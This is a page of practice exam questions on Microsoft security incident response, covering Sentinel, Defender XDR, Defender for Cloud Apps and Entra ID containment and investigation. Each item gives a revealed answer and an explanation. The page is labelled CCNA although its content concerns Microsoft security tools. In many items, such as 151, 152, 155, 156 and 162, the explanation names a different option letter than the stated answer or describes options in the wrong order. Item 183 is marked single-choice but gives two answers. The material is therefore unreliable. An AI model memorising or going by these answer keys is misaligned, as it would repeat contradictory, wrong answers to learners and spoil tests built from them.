CCNA Respond Security Incidents Questions

75 of 489 questions · Page 3/7 · Respond Security Incidents topic · Answers revealed

151
MCQmedium

Your organization uses Microsoft Defender for Cloud Apps and Microsoft Sentinel. An alert indicates that an external IP address is downloading large amounts of data from a SharePoint site containing confidential documents. The activity is coming from a valid user account that appears to be compromised. What should you do first to stop the data exfiltration?

A.Delete the confidential documents from SharePoint
B.Suspend the user account in Microsoft Entra ID
C.Block the external IP address in Microsoft Defender for Cloud Apps
D.Change the SharePoint site permissions to deny access
AnswerB

Suspending the account stops the download immediately.

Why this answer

Option A is correct because suspending the user account immediately stops the download. Option B is wrong because blocking the IP may not be effective if the attacker uses multiple IPs. Option C is wrong because changing permissions is slower.

Option D is wrong because deleting files destroys evidence.

152
MCQmedium

During an incident response, you need to collect email messages from a user's mailbox in Microsoft 365 for evidence. The user is suspected of phishing. Which Microsoft Purview solution should you use?

A.eDiscovery (Standard)
B.Data Loss Prevention
C.Records Management
D.Audit (Standard)
AnswerA

eDiscovery allows searching and exporting mailbox content.

Why this answer

Option C is correct because eDiscovery (Standard) allows authorized users to search and export mailbox content, including email messages, for legal and investigative purposes. Option A is wrong because DLP is for data loss prevention, not collection. Option B is wrong because Records Management is for retention labels.

Option D is wrong because Audit logs track activities, not content collection.

153
MCQhard

The analyst notices that the rule does not fire for a user who has 12 sign-ins from the same IP address, but all are low risk. The expected behavior is to alert when a single user has more than 10 sign-ins from the same IP with at least one high-risk sign-in. What is the issue?

A.The join should be on UserPrincipalName only, not IPAddress.
B.The join should be leftouter to include sign-ins without high risk.
C.The threshold is set to 10, but the user has 12 sign-ins, so it should fire.
D.The query requires a high-risk sign-in from the same IP, but none exist, so no match.
AnswerD

The inner join only returns rows where a high-risk sign-in exists for that user and IP.

Why this answer

Option D is correct. The join requires high-risk sign-ins from the same IP, but the threshold only applies to the first aggregation. If all sign-ins are low risk, no high-risk join match occurs.

Option A is wrong because the threshold is 10. Option B is wrong because the join is inner, which filters out non-matching. Option C is wrong because the join is on both fields.

154
MCQeasy

In Microsoft Sentinel, an incident is created from a Fusion rule that correlates multiple alerts. The incident has a high severity. What should the analyst do first?

A.Run an automated playbook to contain the threat
B.Close the incident as false positive
C.Triage the incident by reviewing the evidence
D.Escalate the incident to senior management
AnswerC

Triage confirms the validity and urgency.

Why this answer

Option C is correct because the first step in incident response within Microsoft Sentinel is to triage the incident by reviewing the evidence. A Fusion rule correlates multiple alerts into a single incident, and the analyst must examine the correlated alerts, entities, and timeline to validate the incident's legitimacy and understand the scope before taking any action. Automated playbooks or escalations should only occur after triage confirms the incident is a genuine threat.

Exam trap

The trap here is that candidates may assume a high-severity incident automatically requires immediate containment or escalation, but Microsoft Sentinel's incident response process mandates triage first to validate the correlation and avoid acting on false positives.

How to eliminate wrong answers

Option A is wrong because running an automated playbook to contain the threat should only occur after triage confirms the incident is a real threat; premature automation could disrupt legitimate operations or waste resources on a false positive. Option B is wrong because closing the incident as a false positive without reviewing the evidence violates the incident response process and could miss a genuine attack that the Fusion rule correctly identified. Option D is wrong because escalating to senior management is premature before triage; escalation should happen only after the analyst has assessed the incident's severity and impact.

155
MCQeasy

An incident in Microsoft Sentinel has been classified as a true positive. According to the incident response process, what should the analyst do next?

A.Contain the incident to prevent further damage.
B.Perform a root cause analysis.
C.Create a new analytic rule to detect similar activity.
D.Document the incident in a detailed report.
AnswerA

Containment is the immediate priority after confirming a true positive.

Why this answer

Option D is correct. After classification, the analyst should contain the threat to prevent further damage. Option A is part of preparation.

Option B is done after containment. Option C is part of post-incident activities.

156
MCQhard

Refer to the exhibit. You are configuring an automation rule in Microsoft Sentinel. The rule triggers when an incident is created, changes its status to 'Active', assigns it to 'tier2', and runs a playbook. However, you notice that the playbook is not executing for incidents with severity 'Low'. What is the most likely reason?

A.The triggers array is empty, so no incidents trigger the rule.
B.The rule has a condition that filters out Low severity incidents.
C.The playbook is disabled in Microsoft Sentinel.
D.The severityFilter excludes incidents with severity 'Low'.
AnswerD

SeverityFilter only includes High and Medium.

Why this answer

Option A is correct because the severityFilter is set to 'High,Medium', so incidents with severity 'Low' are not processed by this automation rule. Option B is wrong because the triggers array is not empty. Option C is wrong because there is no condition blocking Low severity.

Option D is wrong because the rule is enabled (not shown disabled).

157
MCQhard

An organization uses Microsoft Defender XDR. During an incident investigation, the security team needs to determine if a specific file was executed on any devices in the organization over the past 30 days. They have the file hash. What is the most efficient way to get this information?

A.Use the action center to search for the file
B.Use advanced hunting to query for file execution events
C.Review the incident timeline for the file
D.Check the device inventory for the file
AnswerB

Advanced hunting enables powerful KQL queries across device timelines.

Why this answer

Option B is correct because advanced hunting in Microsoft Defender XDR allows querying for file execution events across all devices using the file hash. Option A is wrong because the device inventory does not show execution history. Option C is wrong because the incident timeline is for a specific incident, not a file search across devices.

Option D is wrong because the action center is for response actions, not queries.

158
MCQhard

During an incident response, you need to collect a memory dump from a compromised Windows 10 device managed by Microsoft Defender for Endpoint. Which action should you take in the Microsoft Defender XDR portal?

A.Run a custom detection script
B.Initiate a Live Response session and run the 'memdump' command
C.Execute a Power Automate flow to collect memory
D.Start a full antivirus scan
E.Submit the device for automated investigation
AnswerB

Live Response provides a remote shell to run commands such as 'memdump'.

Why this answer

Live Response allows executing commands like collecting memory dumps. Running a PowerShell script or initiating a scan does not collect a memory dump. The other options are not available actions.

159
Multi-Selecteasy

Which TWO sources of evidence should a security analyst examine first when investigating a user-reported phishing email in Microsoft Defender XDR?

Select 2 answers
A.The email entity page
B.The action center
C.The user's mailbox audit log
D.The user's device timeline
E.Advanced hunting for email events
AnswersA, C

Email entity page contains key email details.

Why this answer

Options B and C are correct. Option B: The email entity page provides details about the email, including sender and links. Option C: The user's mailbox audit log shows if the user interacted with the email.

Option A is wrong because the device timeline is not relevant for email. Option D is wrong because the action center is for response. Option E is wrong because advanced hunting is for complex queries, not first step.

160
Multi-Selectmedium

Which THREE features in Microsoft Sentinel allow an analyst to automate incident response actions?

Select 3 answers
A.Playbooks (Logic Apps)
B.Watchlists
C.Workbooks
D.Automation rules
E.Analytics rules with incident automation
AnswersA, D, E

Playbooks perform complex automated workflows.

Why this answer

Automation rules, playbooks (Logic Apps), and analytics rules with automated responses are all automation features. Watchlists are for reference data, not automation. Workbooks are for visualization.

161
MCQmedium

Your company uses Microsoft Sentinel as its SIEM. You are investigating an incident where a user reported receiving a phishing email that appeared to come from the CEO requesting a wire transfer. The user did not respond. However, the incident also contains alerts from Microsoft Defender for Office 365 indicating that other users clicked on a malicious link in a similar email. The email was sent to 100 users. The company has Microsoft Defender for Endpoint deployed on all devices. The incident requires immediate containment to prevent further compromise. What should you do first?

A.Run a threat hunting query to find all users who clicked the link.
B.Block the malicious URL using Microsoft Defender for Cloud Apps.
C.Isolate the device of the user who reported the email.
D.Delete the email from all users' mailboxes using Microsoft 365 Defender.
AnswerB

Stops access to the URL across all devices.

Why this answer

Blocking the malicious URL in Defender for Cloud Apps or Defender for Endpoint prevents users from accessing it. Option B is for email but not real-time; Option C is later; Option D is for the user's device only.

162
MCQhard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. During an incident, you need to automatically disable a compromised Azure VM from the network. Which playbook action should you use?

A.Apply an Azure Policy to deny network changes.
B.Create an Azure Firewall rule to block the VM's IP.
C.Add a rule to the VM's network security group to deny all traffic.
D.Remove the VM's role assignment from Azure RBAC.
AnswerC

NSG rules can isolate the VM from network traffic.

Why this answer

Option A is correct because you can use Azure Network Security Group to deny all inbound/outbound traffic to the VM. Option B is wrong because Azure RBAC does not affect network access. Option C is wrong because Azure Policy does not apply runtime network controls.

Option D is wrong because Azure Firewall rules are not VM-specific.

163
MCQmedium

During an incident response, a security analyst identifies that a user's account was used to access sensitive data from an anomalous location. The analyst needs to immediately prevent further access from that account while preserving forensic data. Which action should the analyst take?

A.Revoke the user's current sessions in Microsoft Entra ID.
B.Block the IP address of the anomalous location in the firewall.
C.Disable the user account in Microsoft Entra ID.
D.Enable multi-factor authentication (MFA) for the user.
AnswerC

Disabling the account prevents all access and preserves data.

Why this answer

Disabling the user account in Microsoft Entra ID stops access immediately and preserves data. Option A only revokes sessions; Option C is too broad; Option D affects all users.

164
MCQmedium

Your organization uses Microsoft Defender for Endpoint. A user reports that their device is running slowly and exhibiting unusual network activity. You run a live response session and find a suspicious process running. Which action should you take first to contain the threat?

A.Collect a full memory dump for analysis.
B.Terminate the suspicious process.
C.Isolate the device from the network.
D.Add a firewall rule to block outbound traffic from the device.
AnswerC

Isolating the device prevents lateral movement and further damage.

Why this answer

Option A is correct because isolating the device immediately prevents the threat from spreading to other devices while you investigate further. Option B is wrong because terminating the process alone does not prevent re-execution. Option C is wrong because collecting a memory dump does not contain the threat.

Option D is wrong because adding a firewall rule is too slow and may not block all lateral movement.

165
MCQhard

During a ransomware investigation, a security analyst finds that multiple files on a file server have been encrypted. The server runs Microsoft Defender for Cloud and has been onboarded to Microsoft Sentinel. Which data source in Sentinel would provide the most granular information about the file encryption events?

A.Microsoft Defender for Cloud (Azure Defender) alerts
B.Azure Activity Log
C.Windows Security Events via MMA
D.Sysmon events via Azure Monitor Agent
AnswerA

Defender for Cloud can detect file encryption patterns and provide alerts with detailed process and file information.

Why this answer

Microsoft Defender for Cloud (formerly Azure Defender) provides file integrity monitoring and security events at the OS level. Sysmon via AMA would need specific configuration; Windows Security Events may not capture encryption; Azure Activity Log is for control plane events.

166
MCQmedium

You are responding to a data exfiltration incident involving a user who copied sensitive files to a personal cloud storage service. The files were accessed from the user's managed device. Which Microsoft Defender for Cloud Apps activity policy should you create to detect similar future incidents?

A.An anomaly detection policy that flags impossible travel.
B.An activity policy that detects uploads to personal cloud storage services.
C.A file policy that detects files shared with external users.
D.An app discovery policy that identifies new cloud apps used in the organization.
AnswerB

Activity policies monitor specific activities like file uploads to non-corporate apps.

Why this answer

Option C is correct because an activity policy can monitor file uploads to non-corporate cloud apps. Option A is wrong because a file policy applies to files already in cloud apps. Option B is wrong because an anomaly detection policy is for unusual behavior, not specific uploads.

Option D is wrong because an app discovery policy identifies shadow IT apps, not specific activities.

167
MCQeasy

You are investigating a ransomware incident in Microsoft Sentinel. The incident contains multiple alerts. You need to group related alerts under the same incident to reduce alert fatigue. What should you do?

A.Enable User and Entity Behavior Analytics (UEBA).
B.Create a new analytics rule to combine alerts.
C.Use an automation rule to merge incidents.
D.Configure incident creation rules in the analytics rule.
AnswerD

Incident creation rules allow grouping alerts into incidents based on entities.

Why this answer

Option A is correct because incident creation rules in Sentinel automatically group alerts by entities and time window. Option B is wrong because analytics rules create alerts, not incidents. Option C is wrong because automation rules trigger playbooks, not grouping.

Option D is wrong because entity behavior analytics is a separate feature.

168
Multi-Selectmedium

Which TWO of the following are valid response actions that can be taken on a device from Microsoft Defender for Endpoint? (Choose two.)

Select 2 answers
A.Quarantine email
B.Disable user account
C.Run antivirus scan
D.Reset user password
E.Isolate device from network
AnswersC, E

Running antivirus scan is a standard response action.

Why this answer

The correct answers are A and E. Isolation and Run antivirus scan are standard response actions. Option B is wrong because password reset is not a device action.

Option C is wrong because disabling the user is an identity action. Option D is wrong because quarantining an email is a Microsoft 365 Defender action.

169
MCQmedium

During an incident response, you identify that a user's account was used to sign in from an unusual location. You need to contain the incident immediately. What should you do first?

A.Reset the user's password.
B.Disable the user account in Microsoft Entra ID.
C.Revoke the user's refresh tokens.
D.Create a Conditional Access policy to block the user.
AnswerB

Disabling the account immediately stops all sign-ins, containing the incident.

Why this answer

Option A is correct because disabling the user account in Microsoft Entra ID is the fastest way to stop all sign-ins, containing the incident. Option B is wrong because resetting password alone does not prevent the attacker from using existing tokens. Option C is wrong because revoking sessions does not block future sign-ins.

Option D is wrong because Conditional Access policies cannot block a specific user instantly.

170
Multi-Selecteasy

Which TWO are immediate containment actions in Microsoft Sentinel for a compromised Azure VM? (Choose two.)

Select 2 answers
A.Install anti-malware extension
B.Apply an NSG to block all inbound and outbound traffic
C.Reset the VM administrator password
D.Initiate a VM backup
E.Stop the VM using an automation rule
AnswersB, E

NSG blocks network communication immediately.

Why this answer

Option A is correct: Applying a network security group (NSG) to block traffic can be automated via playbook. Option C is correct: Stopping the VM prevents further malicious activity. Option B is wrong because VM extensions may not stop the attack.

Option D is wrong because resetting password does not stop processes. Option E is wrong because initiating backup is not containment.

171
MCQhard

You are responding to a data exfiltration incident in Microsoft Sentinel. The attacker used a PowerShell script to upload data to an external storage account. You need to identify the specific storage account used. Which KQL query should you use in the AzureActivity table?

A.OperationName == 'Get Storage Account Properties'
B.OperationName == 'Storage Blob Upload'
C.OperationName == 'Create or Update Storage Account'
D.OperationName == 'List Storage Account Keys'
AnswerB

Storage Blob Upload is the operation that corresponds to uploading data to a blob.

Why this answer

Option C is correct because Storage Blob Upload is the operation for uploading data. Option A is wrong because List Storage Keys is for managing storage account keys. Option B is wrong because Create or Update Storage Account is for provisioning.

Option D is wrong because Get Storage Account Properties is read-only.

172
MCQhard

A SOC team uses Microsoft Sentinel with Microsoft Defender XDR integration. An incident is created from a Defender for Endpoint alert. The analyst wants to run a KQL query across all affected devices without creating a new analytics rule. How can the analyst achieve this?

A.Modify the analytics rule that created the incident.
B.Use the incident's Logs blade to run a KQL query.
C.Use the Microsoft Sentinel Hunting blade.
D.Create a new workbook.
AnswerB

Logs blade allows ad-hoc querying within the incident context.

Why this answer

Option B is correct because the incident's Logs blade allows running ad-hoc KQL queries. Option A is wrong because the analytics rule is for scheduled queries. Option C is wrong because the workbook is for visualizations.

Option D is wrong because the hunting blade is for proactive hunting, not incident-specific.

173
Multi-Selecthard

Which THREE elements are required to create a custom detection rule in Microsoft Sentinel?

Select 3 answers
A.An alert threshold
B.A KQL query
C.Entity mapping for incident creation
D.An automation playbook
E.A schedule for the query
AnswersB, C, E

The query defines the detection logic.

Why this answer

A custom detection rule requires a KQL query to define logic, a schedule to run the query, and entity mapping to link results to incidents. Alert threshold is optional; playbook is separate.

174
MCQhard

An administrator creates a Microsoft Defender for Cloud Apps policy to block unsanctioned cloud storage apps. Despite the policy, users can still access these apps. What is the most likely cause?

A.The action type 'Block' is incorrect; it should be 'Alert'
B.The policy requires a 'Device' filter to apply to all users
C.The filter uses 'Unsanctioned' tag, but apps are tagged 'Sanctioned'
D.The policy mode is set to 'Monitor', which only alerts and does not block
AnswerD

Monitor mode doesn't enforce actions; it must be set to 'Block' or 'Govern'.

Why this answer

The policy mode is set to 'Monitor' instead of 'Govern' or 'Block'. In Microsoft Defender for Cloud Apps, policies in 'Monitor' mode only generate alerts, not block. The action 'Block' is defined but the policy mode must be set to 'Block' or 'Govern' to enforce.

The filter and actions are correct.

175
MCQmedium

You are reviewing an alert rule in Microsoft Sentinel created via ARM template. What is the primary purpose of this rule?

A.To send an alert when a sign-in with high risk level is detected.
B.To isolate the user's device from the network.
C.To automatically block the user from signing in.
D.To create an incident in Microsoft Sentinel.
AnswerA

The rule triggers on high risk sign-ins and sends an alert via the action group.

Why this answer

Option B is correct because the rule triggers when a sign-in risk level is high, sending an alert to an action group. Option A is wrong because it does not block the user. Option C is wrong because it creates an alert, not an incident directly.

Option D is wrong because it does not isolate devices.

176
Multi-Selectmedium

Which TWO tools in Microsoft Defender XDR provide automated investigation and response capabilities?

Select 2 answers
A.Microsoft Defender for Endpoint
B.Microsoft Defender for Office 365
C.Microsoft Defender for Identity
D.Microsoft Defender for Cloud Apps
E.Microsoft Defender for Cloud
AnswersA, B

Defender for Endpoint includes AIR for endpoint incidents.

Why this answer

Automated investigation and response (AIR) is available in Defender for Office 365 and Defender for Endpoint. Defender for Identity and Defender for Cloud Apps have some automation but not full AIR. Defender for Cloud is separate.

177
MCQhard

An organization uses Microsoft Sentinel with the Microsoft Defender XDR connector. An incident is generated for a user who is suspected of being compromised. The analyst wants to automatically block the user's sign-ins using a playbook. Which connector should the playbook use?

A.Microsoft Sentinel connector
B.Microsoft 365 Defender connector
C.Microsoft Entra ID connector
D.Microsoft Teams connector
AnswerC

The Microsoft Entra ID connector (Azure AD) can perform actions such as blocking user sign-ins or revoking sessions.

Why this answer

Microsoft Entra ID (Azure AD) connector allows updating user risk or disabling account. Microsoft 365 Defender is for alerts; Teams is for notifications; Sentinel connector is for ingestion.

178
MCQeasy

A SOC analyst needs to investigate a potential data exfiltration incident involving a user uploading files to an external cloud storage service. Which Microsoft Sentinel data source would provide the MOST relevant information?

A.SigninLogs
B.CommonSecurityLog
C.AzureActivity
D.OfficeActivity
AnswerD

Tracks file operations in SharePoint and OneDrive.

Why this answer

Option B is correct because OfficeActivity includes SharePoint and OneDrive audit logs, which track file uploads. Option A is wrong because SigninLogs only shows sign-ins. Option C is wrong because AzureActivity tracks Azure resource actions, not file uploads.

Option D is wrong because CommonSecurityLog is for firewall logs, not file uploads.

179
MCQmedium

Refer to the exhibit. You are reviewing a Microsoft Sentinel scheduled analytics rule configured as above. An incident was created for multiple alerts triggering within a 5-hour window. The SOC team needs to investigate each alert separately because they involve different user accounts. What should the analyst do to ensure each alert generates a separate incident?

A.Change the matchingMethod to 'AnyAlert'.
B.Set 'enabled' to false under groupingConfiguration.
C.Set 'reopenClosedIncident' to true.
D.Change the lookbackDuration to PT0H.
AnswerB

Disabling grouping ensures each alert creates a new incident.

Why this answer

Option D is correct because setting 'enabled' to false under groupingConfiguration disables grouping, so each alert becomes its own incident. Option A is wrong because increasing lookbackDuration would group more alerts. Option B is wrong because changing matchingMethod to 'AllEntities' is already set and does not affect grouping behavior.

Option C is wrong because enabling 'reopenClosedIncident' is for reopening, not for separating alerts.

180
Multi-Selecthard

Which THREE data sources in Microsoft Sentinel can be used to detect lateral movement in a network? (Choose three.)

Select 3 answers
A.DNS logs
B.Microsoft Defender for Endpoint (device events)
C.Windows Event Logs (Event ID 5140)
D.Windows Security Events (Event ID 4624)
E.Microsoft Entra ID sign-in logs
AnswersB, C, D

Defender for Endpoint provides process creation and network connections that can reveal lateral movement.

Why this answer

A, B, and D are correct. Windows Security Events (Event ID 4624) show logon attempts. Windows Event Logs (Event ID 5140) show network share accesses.

Microsoft Defender for Endpoint provides process and network connections. C is wrong because Azure AD sign-in logs are for cloud authentication, not lateral movement. E is wrong because DNS logs may show network resolution but not direct lateral movement evidence.

181
Multi-Selecthard

During a ransomware incident, Microsoft Defender for Cloud Apps alerts indicate that a user is uploading large volumes of data to an external cloud storage provider not approved by your organization. Which two actions should you take first? (Choose two.)

Select 2 answers
A.Block the unapproved cloud storage app
B.Suspend the user's account
C.Notify the user about the policy violation
D.Initiate a legal hold on the user's data
AnswersA, B

Blocking the app prevents further uploads.

Why this answer

The immediate actions are to suspend the user's access to prevent further data exfiltration and block the unapproved app to stop data uploads. Initiating a legal hold and notifying the user are later steps.

182
MCQmedium

An incident in Microsoft Defender XDR involves a device that is suspected to be infected with ransomware. The device is online and actively encrypting files. Which action should you take to contain the threat?

A.Isolate the device from the network
B.Disable the user's account
C.Run a full antivirus scan on the device
D.Collect a memory dump from the device
AnswerA

Isolation prevents further spread and encryption.

Why this answer

The immediate containment action is to isolate the device from the network to stop lateral movement and encryption. Running antivirus or collecting forensic data is secondary. Disabling the user account does not stop the device.

183
MCQmedium

Based on the ARM template snippet, what is the purpose of this analytics rule?

A.To detect multiple failed logon attempts within a time window
B.To detect brute force attacks on user accounts
C.To detect successful logins by account
D.To detect account lockouts
AnswerA, B

The rule alerts when failed logon count exceeds 5.

Why this answer

Option C is correct because the query counts failed logon events (EventID 4625) and triggers when count > 5, indicating brute force attempts. Option A is wrong because EventID 4625 is failed logon, not success. Option B is wrong because the query does not include multiple event IDs.

Option D is wrong because the query does not check for account lockouts.

184
MCQhard

During an incident response, a SOC analyst identifies that a malicious PowerShell script was executed on multiple endpoints. The analyst needs to collect relevant files from all affected endpoints for further analysis. What should the analyst use?

A.Microsoft Defender for Cloud Apps file investigation.
B.Microsoft Purview eDiscovery.
C.Microsoft Defender for Endpoint Live Response.
D.Microsoft Sentinel incident investigation graph.
AnswerC

Live Response allows remote file collection from endpoints.

Why this answer

Option D is correct because Microsoft Defender for Endpoint's Live Response allows collecting files from endpoints. Option A is wrong because Microsoft Defender for Cloud Apps does not collect files from endpoints. Option B is wrong because Microsoft Sentinel is for SIEM, not live file collection.

Option C is wrong because Microsoft Purview is for compliance.

185
MCQmedium

Refer to the exhibit. A SOC analyst runs this KQL query in Microsoft Sentinel to investigate devices in the finance subnet. Which result would indicate that a device might be compromised?

A.A device with multiple connected networks, including an external IP.
B.A device named 'finance-server-01' with a single network connection.
C.A device with no network connections in the last 7 days.
D.A device with a LocalIPAddress starting with 10.0.0.
AnswerA

Multiple networks, especially including external, could indicate compromise.

Why this answer

The correct answer is D. A device with multiple connected networks, especially if those networks are unusual (e.g., a finance device connecting to external networks), could indicate lateral movement or command and control. The other options are not inherently suspicious.

186
MCQhard

Refer to the exhibit. An analyst runs the query to identify the top 10 entities with the most malware alerts. However, the query returns no results. What is the most likely reason?

A.The SecurityAlert table does not contain the AlertName field.
B.The AlertName field does not contain the substring 'Malware' (case-sensitive issue).
C.The 'has' operator requires an exact match.
D.The 'take 10' operator returns no results because there are fewer than 10 alerts.
AnswerB

The 'has' operator is case-insensitive, but the substring might be different.

Why this answer

Option B is correct because the query uses 'has' which is case-insensitive, but 'Malware' may not be the exact substring in the AlertName field. Option A is wrong because the query uses SecurityAlert table, which is correct. Option C is wrong because 'has' works on strings, not just exact matches.

Option D is wrong because 'take 10' limits results, but would not cause zero results.

187
MCQeasy

You receive an incident in Microsoft Sentinel that is a low-confidence alert from Microsoft Defender for Identity. What should be your first step?

A.Investigate the alert by reviewing related entities and logs.
B.Close the incident as a false positive.
C.Escalate to senior management.
D.Isolate the affected account immediately.
AnswerA

Investigation determines if the alert is a true positive before taking action.

Why this answer

Option A is correct. The analyst should first investigate to determine if the alert is a true positive. Option B is premature without investigation.

Option C is a post-investigation step. Option D is not appropriate for a low-confidence alert.

188
MCQeasy

You have been tasked with creating an automated response in Microsoft Sentinel for incidents involving lateral movement. Which Azure service allows you to run a playbook to automatically isolate a compromised VM?

A.Azure Logic Apps
B.Kusto Query Language (KQL)
C.Microsoft Defender XDR advanced hunting
D.Azure Event Hubs
AnswerA

Playbooks in Sentinel are implemented as Logic Apps workflows.

Why this answer

Option A is correct because Microsoft Sentinel playbooks are built on Azure Logic Apps, which can execute automated actions like VM isolation. Option B is a query language, not an automation service. Option C is a data ingestion service.

Option D is a query environment, not for automation.

189
Multi-Selecthard

Which TWO remediation actions are available in Microsoft Defender for Endpoint when responding to a malware infection?

Select 2 answers
A.Run a full antivirus scan
B.Disable the user account
C.Reset the device to factory settings
D.Block the application in Defender for Cloud Apps
E.Isolate the device from the network
AnswersA, E

Can be initiated from the portal.

Why this answer

Option A is correct because Defender for Endpoint can run AV scan. Option B is correct because isolation is a common action. Option C is wrong because this is a post-remediation step.

Option D is wrong because this is done in Microsoft Entra ID. Option E is wrong because this is for cloud apps.

190
MCQhard

Your organization uses Microsoft Sentinel with UEBA (User and Entity Behavior Analytics). An alert indicates a user's sign-in from an unusual location, followed by a mass download of sensitive files from SharePoint. The user is a low-privilege employee. What is the most likely conclusion?

A.The user's account is compromised
B.The alert is a false positive due to user travel
C.The user is an insider threat
D.The user is conducting a ransomware attack
AnswerA

Unusual location and anomalous data access strongly indicate compromise.

Why this answer

The combination of unusual location and mass download of sensitive files by a low-privilege user suggests account compromise. It is not necessarily ransomware or a false positive, and insider threat is less likely without evidence of intent.

191
Multi-Selecthard

Which THREE data sources should be included in a Microsoft Sentinel workspace to comprehensively monitor for lateral movement within an Azure environment?

Select 3 answers
A.Azure AD sign-in logs
B.Power BI audit logs
C.Azure Network Security Group flow logs
D.Azure DevOps audit logs
E.Azure Activity logs
AnswersA, C, E

Sign-in logs reveal authentication attempts from compromised accounts.

Why this answer

Options A, B, and C are correct because they cover compute, network, and identity aspects of lateral movement. Option D is wrong because Azure DevOps is for development, not runtime. Option E is wrong because Power BI is not involved in lateral movement.

192
MCQhard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud Apps. You receive a high-severity incident indicating that a user's credentials were used to access a sensitive SharePoint site from an unmanaged device. The user, 'jdoe@contoso.com', is a senior executive. The IP address is from a public Wi-Fi hotspot. The incident includes a recommendation to apply session policy to block download of sensitive files. You need to create a policy in Microsoft Defender for Cloud Apps that blocks downloads from unmanaged devices for this specific user when accessing the sensitive site. The policy should trigger only when the user accesses the specific SharePoint site named 'ExecConfidential'. What should you do?

A.Create an app connector for SharePoint and a session policy that targets the user, site, and device tag 'Unmanaged' with the action 'Block download'.
B.Create a device compliance policy in Microsoft Intune to block unmanaged devices from accessing SharePoint.
C.Create a Conditional Access policy in Microsoft Entra ID to require compliant device for the SharePoint site.
D.Create a file policy in Defender for Cloud Apps to quarantine files downloaded from the site.
AnswerA

Session policies in Defender for Cloud Apps can block specific actions like download for unmanaged devices.

Why this answer

Option D is correct because creating an app connector for SharePoint, then a session policy that targets the specific site, user, and device tag 'Unmanaged' with the action 'Block download' meets all requirements. Option A is wrong because a device compliance policy is in Intune, not Defender for Cloud Apps. Option B is wrong because an access policy in Microsoft Entra ID does not have the granularity to block downloads.

Option C is wrong because a file policy monitors file sharing, not session control.

193
MCQmedium

Your organization has Microsoft Defender for Endpoint deployed. A security analyst receives an alert about a suspicious PowerShell command executed on a device. The analyst needs to investigate the process tree. Which feature should the analyst use?

A.Device isolation
B.Live response
C.Timeline (process timeline)
D.Advanced hunting
AnswerC

Timeline shows process tree and events.

Why this answer

The correct answer is C because the timeline in Defender for Endpoint provides a detailed process tree and events. Option A is wrong because Advanced hunting is for querying, not visual process tree. Option B is wrong because the device isolation is for containment.

Option D is wrong because live response is for remote commands, not investigation.

194
Multi-Selecthard

Which TWO actions should be taken to respond to a potential data exfiltration incident detected by Microsoft Defender for Cloud Apps?

Select 2 answers
A.Block the IP address of the user's device at the firewall.
B.Suspend the user account in Microsoft Entra ID.
C.Report the user to Microsoft for investigation.
D.Revoke all active sessions for the user in Defender for Cloud Apps.
E.Run a full antivirus scan on the user's device.
AnswersB, D

Suspending the account stops the user from accessing any cloud apps immediately.

Why this answer

Suspending the user account and revoking active sessions are immediate containment actions. Blocking IP is good but may not be sufficient if the user is compromised. Reporting to Microsoft is not immediate.

Running a full scan is not for cloud apps.

195
MCQmedium

During an incident investigation in Microsoft Sentinel, you need to gather related events from multiple data sources into a single view for analysis. Which feature should you use?

A.Workbooks
B.Investigation graph
C.Watchlists
D.Logs blade
E.Analytics rules
AnswerB

Provides a visual map of entities and related data.

Why this answer

The Investigation graph in Microsoft Sentinel is specifically designed to visually correlate and explore related entities and events across multiple data sources within a single investigation. It allows you to pivot from an alert or entity to see connected users, hosts, IP addresses, and other events, providing a unified view for analysis. This feature directly addresses the need to gather related events from disparate sources into one cohesive view during incident response.

Exam trap

The trap here is that candidates often confuse the Investigation graph with Workbooks or the Logs blade, mistakenly thinking that any visualization or query tool can serve the same purpose, but the Investigation graph is the only feature purpose-built for interactive, entity-centric incident exploration in Sentinel.

How to eliminate wrong answers

Option A is wrong because Workbooks are used for creating custom dashboards and reports for visualizing data trends, not for interactive, entity-based incident investigation. Option C is wrong because Watchlists are static collections of data (e.g., IP addresses or hashes) used for correlation or enrichment in queries, not for dynamic event gathering across sources. Option D is wrong because the Logs blade is a query interface for running KQL queries against raw log data, but it does not provide a built-in, visual entity relationship view for incident investigation.

Option E is wrong because Analytics rules are used to create detection logic that generates alerts, not to investigate or correlate events after an alert has been triggered.

196
Multi-Selecthard

Which THREE steps are part of the containment phase of incident response in Microsoft Sentinel? (Select THREE.)

Select 3 answers
A.Disable compromised user accounts in Microsoft Entra ID.
B.Isolate affected devices using Microsoft Defender for Endpoint.
C.Collect forensic data from affected endpoints.
D.Block malicious IP addresses and domains in Microsoft Defender for Cloud Apps.
E.Restore encrypted files from backup.
AnswersA, B, D

Disabling accounts stops further misuse.

Why this answer

Option A is correct because isolating affected resources prevents further damage. Option C is correct because blocking indicators helps stop attacks. Option E is correct because disabling compromised accounts stops unauthorized access.

Option B is wrong because collecting forensic data is part of investigation, not containment. Option D is wrong because restoring from backup is part of recovery.

197
Multi-Selecteasy

Which TWO actions should be taken immediately when a compromised user account is detected in Microsoft Entra ID?

Select 2 answers
A.Revoke all current sessions.
B.Notify the user's manager.
C.Disable the user account.
D.Reset the user's password.
E.Block sign-ins from the user's IP address.
AnswersA, C

Terminates active sessions.

Why this answer

Revoking all current sessions (Option A) is a critical immediate action because it terminates all active authentication tokens and sessions for the compromised account, preventing the attacker from continuing to use existing tokens to access resources. This action leverages Microsoft Entra ID's token revocation capabilities, which invalidate refresh tokens and access tokens issued before the revocation, effectively cutting off the attacker's current access without waiting for password changes or other mitigations.

Exam trap

The trap here is that candidates often choose 'Reset the user's password' as the first action, overlooking that existing sessions remain valid until tokens expire, so session revocation must precede password reset to fully contain the compromise.

198
MCQhard

Refer to the exhibit. A SOC analyst runs this Advanced Hunting query in Microsoft Defender XDR to detect potential living-off-the-land (LotL) attacks. An alert is triggered when a device shows multiple occurrences of 'mshta.exe' executing with a remote script. Which additional data source should the analyst check to confirm the attack?

A.DeviceFileEvents
B.DeviceNetworkEvents
C.DeviceLogonEvents
D.DeviceRegistryEvents
AnswerB

Network events show connections to remote IPs, confirming the remote script execution.

Why this answer

The correct answer is D. Network communication from the device to an external IP would confirm a remote connection attempt. The other options are not directly relevant or are redundant.

199
Multi-Selectmedium

Which TWO actions should an analyst take when triaging a Microsoft Sentinel incident that involves a user who clicked a malicious link in a phishing email? (Choose two.)

Select 2 answers
A.Reset the user's password immediately.
B.Block the sender's domain in the tenant's block list.
C.Run a KQL query on EmailEvents to identify the email and recipient.
D.Delete the email from the user's mailbox immediately.
E.Check the email's status in Microsoft Defender for Office 365 Threat Explorer.
AnswersC, E

